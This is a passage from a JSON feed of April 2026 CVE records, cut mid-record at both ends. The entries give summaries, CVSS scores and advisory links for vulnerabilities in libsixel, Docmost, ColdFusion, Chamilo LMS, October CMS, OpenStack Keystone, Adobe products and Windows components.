kmiya's sixel. Versions 1.8.7 and prior contain an integer overflow leading to an out-of-bounds heap read in the --crop option handling of img2sixel, where positive coordinates up to INT_MAX are accepted without overflow-safe bounds checking. In sixel_encoder_do_clip(), the expression clip_w + clip_x overflows to a large negative value when clip_x is INT_MAX, causing the bounds guard to be skipped entirely, and the unclamped coordinate is passed through sixel_frame_clip() to clip(), which computes a source pointer far beyond the image buffer and passes it to memmove(). An attacker supplying a specially crafted crop argument with any valid image can trigger an out-of-bounds read in the heap, resulting in a reliable crash and potential information disclosure. This issue has been fixed in version 1.8.7-r1.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-c854-ffg9-g72c"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33020","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. Versions 1.8.7 and prior contain an integer overflow which leads to a heap buffer overflow via sixel_frame_convert_to_rgb888() in frame.c, where allocation size and pointer offset computations for palettised images (PAL1, PAL2, PAL4) are performed using int arithmetic before casting to size_t. For images whose pixel count exceeds INT_MAX / 4, the overflow produces an undersized heap allocation for the conversion buffer and a negative pointer offset for the normalization sub-buffer, after which sixel_helper_normalize_pixelformat() writes the full image data starting from the invalid pointer, causing massive heap corruption confirmed by ASAN. An attacker providing a specially crafted large palettised PNG can corrupt the heap of the victim process, resulting in a reliable crash and potential arbitrary code execution.\nThis issue has been fixed in version 1.8.7-r1.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-2xgm-4x47-2x2p"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33146","summary":"Docmost is open-source collaborative wiki and documentation software. An authorization bypass vulnerability in versions 0.70.0 through 0.70.2 exposes restricted child page titles and text snippets through the public search endpoint (`POST /api/search/share-search`) for publicly shared content. This flaw allows unauthenticated users to enumerate and retrieve content that should remain hidden from public share viewers, leading to a confidentiality breach. Version 0.70.3 contains a patch.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/docmost/docmost/security/advisories/GHSA-qq4c-8rjr-w42c"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33193","summary":"Docmost is open-source collaborative wiki and documentation software. Versions prior to 0.70.0 are vulnerable to a stored cross-site scripting (XSS) attack due to improper handling of MIME type spoofing (GHSL-2026-052). An attacker could exploit this flaw to inject malicious scripts, potentially compromising the security of users and data. Version 0.70.0 contains a patch.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/docmost/docmost/security/advisories/GHSA-7cq4-577p-wp6p"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27282","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue requires user interaction.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27304","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27305","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27306","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Attacker requires elevated privileges. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27307","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. A high-privileged attacker could exploit this vulnerability and exhaust system resources, reducing application speed. Exploitation of this issue does not require user interaction.","cvss":2.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-15565","summary":"The Nexi XPay plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the redirect function in all versions up to, and including, 8.3.0. This makes it possible for unauthenticated attackers to mark pending WooCommerce orders as paid/completed.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/cartasi-x-pay/tags/8.2.0/src/classes/Nexi/WC_Gateway_XPay_Process_Completion.php#L268","https://www.wordfence.com/threat-intel/vulnerabilities/id/f420151b-c783-49b1-b0e9-e936a904278a?source=cve"],"published_time":"2026-04-14T22:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33715","summary":"Chamilo LMS is an open-source learning management system. In version 2.0-RC.2, the file public/main/inc/ajax/install.ajax.php is accessible without authentication on fully installed instances because, unlike other AJAX endpoints, it does not include the global.inc.php file that performs authentication and installation-completed checks. Its test_mailer action accepts an arbitrary Symfony Mailer DSN string from POST data and uses it to connect to an attacker-specified SMTP server, enabling Server-Side Request Forgery (SSRF) into internal networks via the SMTP protocol. An unauthenticated attacker can also abuse this to weaponize the Chamilo server as an open email relay for phishing and spam campaigns, with emails appearing to originate from the server's IP address. Additionally, error responses from failed SMTP connections may disclose information about internal network topology and running services. This issue has been fixed in version 2.0.0-RC.3.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-mxc9-9335-45mc"],"published_time":"2026-04-14T21:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34160","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the PENS (Package Exchange Notification Services) plugin endpoint at public/plugin/Pens/pens.php is accessible without authentication and accepts a user-controlled package-url parameter that the server fetches using curl without filtering private or internal IP addresses, enabling unauthenticated Server-Side Request Forgery (SSRF). An attacker can exploit this to probe internal network services, access cloud metadata endpoints (such as 169.254.169.254) to steal IAM credentials and sensitive instance metadata, or trigger state-changing operations on internal services via the receipt and alerts callback parameters. No authentication is required to exploit either SSRF vector, significantly increasing the attack surface. This issue has been fixed in version 2.0.0-RC.3.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/de4058d76fac2413afd023b1ec942e8e79579011","https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-g2xj-4cch-j276"],"published_time":"2026-04-14T21:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34161","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the social post attachment upload functionality, where an authenticated user can upload a malicious HTML file containing JavaScript via the /api/social_post_attachments endpoint. The uploaded file is served back from the application at the generated contentUrl without sanitization, content type restrictions, or a Content-Disposition: attachment header, causing the JavaScript to execute in the browser within the application's origin. Because the payload is stored server-side and runs in the trusted origin, an attacker can perform session hijacking, account takeover, privilege escalation (if an admin views the link), and arbitrary actions on behalf of the victim. This issue has been fixed in version 2.0.0-RC.3.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/7c4965e48769d1d06413836429e386816a465c7f","https://github.com/chamilo/chamilo-lms/commit/da671d66a146887be3a16eabc5dcf0a92c55f7da","https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-273p-jw9w-3g22"],"published_time":"2026-04-14T21:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25125","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.14 and 4.1.10 contain a server-side information disclosure vulnerability in the INI settings parser. Because PHP's parse_ini_string() function supports ${} syntax for environment variable interpolation, attackers with Editor access could inject patterns such as ${APP_KEY} or ${DB_PASSWORD} into CMS page settings fields, causing sensitive environment variables to be resolved, stored in the template, and returned to the attacker when the page was reopened. This could enable exfiltration of credentials and secrets (database passwords, AWS keys, application keys), potentially leading to further attacks such as database access or cookie forgery. The vulnerability is only relevant when cms.safe_mode is enabled, as direct PHP injection is already possible otherwise. This issue has been fixed in versions 3.7.14 and 4.1.10. If users are unable to immediately upgrade, they can workaround this issue by restricting Editor tool access to fully trusted administrators only, and ensuring database and cloud service credentials are not accessible from the web server's network.","cvss":4.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-g6v3-wv4j-x9hg"],"published_time":"2026-04-14T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25133","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.14 and 4.1.10 contain a stored cross-site scripting (XSS) vulnerability in the SVG sanitization logic. The regex pattern used to strip event handler attributes (such as onclick or onload) could be bypassed using a crafted payload that exploits how the pattern matches attribute boundaries, allowing malicious SVG files to be uploaded through the Media Manager with embedded JavaScript. Exploitation could lead to privilege escalation if a superuser views or embeds the malicious SVG, and requires authenticated backend access with media upload permissions. The SVG must be viewed or embedded in a page for the payload to trigger. This issue has been fixed in versions 3.7.14 and 4.1.10.","cvss":4.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.8,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-gcqv-f29m-67gr"],"published_time":"2026-04-14T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27287","summary":"InCopy versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/incopy/apsb26-33.html"],"published_time":"2026-04-14T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33714","summary":"Chamilo is an open-source learning management system (LMS). Version 2.0.0-RC.2 contains a SQL Injection vulnerability in the statistics AJAX endpoint, which is an incomplete fix for CVE-2026-30881. While CVE-2026-30881 was patched by applying Security::remove_XSS() to the date_start and date_end parameters in the get_user_registration_by_month action, the same parameters remain unsanitized in the users_active action within the same file (public/main/inc/ajax/statistics.ajax.php), where they are directly interpolated into a SQL query. An authenticated admin can exploit this to perform time-based blind SQL injection, enabling extraction of arbitrary data from the database. This issue has been fixed in version 2.0.0.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-w8c4-c7r8-qgw2"],"published_time":"2026-04-14T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24893","summary":"openITCOCKPIT is an open source monitoring tool built for different monitoring engines. openITCOCKPIT Community Edition prior to version 5.5.2 contains a command injection vulnerability that allows an authenticated user with permission to add or modify hosts to execute arbitrary OS commands on the monitoring backend. The vulnerability arises because user-controlled host attributes (specifically the host address) are expanded into monitoring command templates without validation, escaping, or quoting. These templates are later executed by the monitoring engine (Nagios/Icinga) via a shell, resulting in remote code execution. Version 5.5.2 patches the issue.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openITCOCKPIT/openITCOCKPIT/releases/tag/openITCOCKPIT-5.5.2","https://github.com/openITCOCKPIT/openITCOCKPIT/security/advisories/GHSA-789q-pw85-j2q2","https://openitcockpit.io/blog/posts/2026/2026-04-14-openitcockpit-agent-3.6.0-and-5.5.2"],"published_time":"2026-04-14T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40683","summary":"In OpenStack Keystone before 28.0.1, the LDAP identity backend does not convert the user enabled attribute to a boolean when the user_enabled_invert configuration option is False (the default). The _ldap_res_to_model method in the UserApi class only performed string-to-boolean conversion when user_enabled_invert was True. When False, the raw string value from LDAP (e.g., \"FALSE\") was used directly. Since non-empty strings are truthy in Python, users marked as disabled in LDAP were treated as enabled by Keystone, allowing them to authenticate and perform actions. All deployments using the LDAP identity backend without user_enabled_invert=True or user_enabled_emulation are affected.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://bugs.launchpad.net/keystone/+bug/2121152","https://bugs.launchpad.net/keystone/+bug/2141713","https://review.opendev.org/958205","https://www.openwall.com/lists/oss-security/2026/04/14/9"],"published_time":"2026-04-14T20:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34618","summary":"Illustrator versions 30.2, 29.8.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/illustrator/apsb26-42.html"],"published_time":"2026-04-14T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34630","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27289","summary":"Photoshop Desktop versions 27.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/photoshop/apsb26-40.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27310","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27311","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27312","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27313","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27222","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Divide By Zero vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application or render it unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34624","summary":"Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html"],"published_time":"2026-04-14T19:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34625","summary":"Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html"],"published_time":"2026-04-14T19:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34623","summary":"Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a specially crafted web page.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html"],"published_time":"2026-04-14T19:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5752","summary":"Sandbox Escape Vulnerability in Terrarium allows arbitrary code execution with root privileges on a host process via JavaScript prototype chain traversal.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/cohere-ai/cohere-terrarium","https://kb.cert.org/vuls/id/414811"],"published_time":"2026-04-14T18:17:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5754","summary":"Reflected Cross-Site Scripting (XSS) Vulnerability in Radware Alteon 34.5.4.0 vADC load-balancer allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized actions, data theft, or other malicious activities.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.radware.com/products/alteon/"],"published_time":"2026-04-14T18:17:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5756","summary":"Unauthenticated Configuration File Modification Vulnerability in DRC Central Office Services (COS) allows an attacker to modify the server's configuration file, potentially leading to mass data exfiltration, malicious traffic interception, or disruption of testing services.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.datarecognitioncorp.com/"],"published_time":"2026-04-14T18:17:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34628","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T18:17:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34629","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T18:17:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34614","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:17:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34615","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:17:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34617","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a Cross-Site Scripting (XSS) vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.","cvss":8.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:17:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34627","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T18:17:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33825","summary":"Insufficient granularity of access control in Microsoft Defender allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825"],"published_time":"2026-04-14T18:17:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33826","summary":"Improper input validation in Windows Active Directory allows an authorized attacker to execute code over an adjacent network.","cvss":8.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33826"],"published_time":"2026-04-14T18:17:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33827","summary":"Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an unauthorized attacker to execute code over a network.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33827"],"published_time":"2026-04-14T18:17:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33829","summary":"Exposure of sensitive information to an unauthorized actor in Windows Snipping Tool allows an unauthorized attacker to perform spoofing over a network.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829"],"published_time":"2026-04-14T18:17:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33120","summary":"Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a 